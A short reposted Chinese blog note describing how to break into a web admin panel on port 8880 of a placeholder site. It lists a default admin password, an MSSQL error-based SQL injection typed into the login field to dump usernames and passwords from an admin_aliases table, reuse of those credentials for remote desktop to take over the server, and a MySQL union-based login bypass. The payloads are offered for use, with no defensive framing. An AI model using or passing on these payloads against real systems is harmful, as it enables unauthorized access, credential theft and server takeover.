1,在http://xxxxxx.com:8880这里,默认的管理员账户密码是admin 密码stepu
mssql版本
账号 ' union select top 1 login+char(124)+passwd from admin_aliases--
报错,爆出账号密码
登陆后server-->remote desktop账号密码一样
拿到服务器权限
mysql版本
'union select '-1 union select 1,1,1#'# 密码填 1
本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/496153,如需转载请自行联系原作者